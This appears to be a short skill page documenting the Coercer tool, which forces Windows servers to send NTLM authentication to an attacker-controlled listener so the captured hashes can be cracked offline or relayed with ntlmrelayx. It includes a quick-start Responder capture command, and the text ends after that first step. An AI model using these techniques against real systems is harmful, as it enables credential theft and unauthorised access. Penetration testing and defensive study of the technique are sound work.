coercer
Installation
SKILL.md
Coercer
Force Windows servers to authenticate (NTLM) to your listener — enables relay, capture, and hash extraction.
Concept
Coercer abuses multiple RPC protocols/methods that trigger a Windows host to initiate an outbound NTLM authentication to an attacker-controlled IP. The captured Net-NTLMv2 hash can be:
- Cracked offline (Hashcat/John)
- Relayed in real-time (ntlmrelayx) to access other systems
Quick Start
# Coerce auth from a server, capture with Responder
# Terminal 1: Start Responder
responder -I eth0 -wv